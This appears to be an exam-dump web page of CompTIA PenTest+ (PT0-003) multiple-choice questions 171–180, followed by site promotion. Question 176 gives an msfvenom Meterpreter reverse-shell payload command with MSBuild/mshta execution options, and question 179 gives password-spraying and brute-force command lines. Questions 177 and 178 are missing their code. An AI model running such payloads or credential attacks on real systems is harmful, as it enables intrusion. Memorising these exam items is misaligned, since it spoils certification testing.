PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :Jun 09, 2026

CompTIA PT0-003 Online Questions & Answers

  • Question 171:

    Which of the following can an access control vestibule help deter?

    A. USB drops
    B. Badge cloning
    C. Lock picking
    D. Tailgating

  • Question 172:

    Which of the following would most likely reduce the possibility of a client rejecting the final deliverable for a penetration test?

    A. Goal reprioritization
    B. Stakeholder alignment
    C. Non-disclosure agreement
    D. Business impact analysis

  • Question 173:

    A penetration tester is performing a security review of a web application.

    Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

    A. VM
    B. IAST
    C. DAST
    D. SCA

  • Question 174:

    A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster.

    Which of the following tools would be best to use for this purpose?

    A. NSE
    B. Nessus
    C. CME
    D. Trivy

  • Question 175:

    A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

    Which of the following commands should be used to accomplish the goal?

    A. VRFY and EXPN
    B. VRFY and TURN
    C. EXPN and TURN
    D. RCPT TO and VRFY

  • Question 176:

    A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

    The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.

    Which of the following commands would most likely be used by the tester to continue with the attack on the host?

    A. regsvr32 /s /n /u C:\evil.xml
    B. MSBuild.exe C:\evil.xml
    C. mshta.exe C:\evil.xml
    D. AppInstaller.exe C:\evil.xml

  • Question 177:

    DRAG DROP

    A manager calls upon a tester to assist with diagnosing an issue within the following:

    Python script: #!/usr/bin/python s = “Administrator”

    The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all.

    Select and Place:

  • Question 178:

    During an engagement, a penetration tester receives a list of target systems and wants to enumerate them

    for possible vulnerabilities. The tester finds the following script on the internet:

    After running the script, the tester runs the following command:

    Which of the following should the tester do next?

    A. Replace line 4 with the following: api = "/api/v2/getToken/data/id/None"
    B. Insert the following line before line 6: target = target.split(" ")[0]
    C. Insert the following line before line 7: url = url.lstrip(' http://')
    D. Replace line 7 with the following: response = requests.post(url, api)

  • Question 179:

    A penetration tester is evaluating the security of a corporate client's web application using federated access.

    Which of the following approaches has the least possibility of blocking the IP address of the tester's machine?

    A. for user in $(cat users.txt); do for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -sq -XPOST https://example.com/login.asp-d "username=$user&password=$pass" | grep "Welcome" && echo "OK: $user $pass" done done
    B. spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.plan spray365.py spray target.plan
    C. import requests, pathlib users = pathlib.Path("users.txt").read_text() passwords = pathlib.Path("passwords.txt").read_text() for user in users: for pass in passwords: r = requests.post("https://example.com", data=f"username={user}&password={pass}", headers={"user-agent":"Mozilla/5.0"}) if "Welcome" in r.text: print(f"OK: {user} {pass}")
    D. hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <domain_ip> http-post-form "/ login.asp:username=^USER^&password=^PASS^:Invalid Password"

  • Question 180:

    A tester compromises a target host and then wants to maintain persistent access.

    Which of the following is the best way for the attacker to accomplish the objective?

    A. Configure and register a service.
    B. Install and run remote desktop software.
    C. Set up a script to be run when users log in.
    D. Perform a kerberoasting attack on the host.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.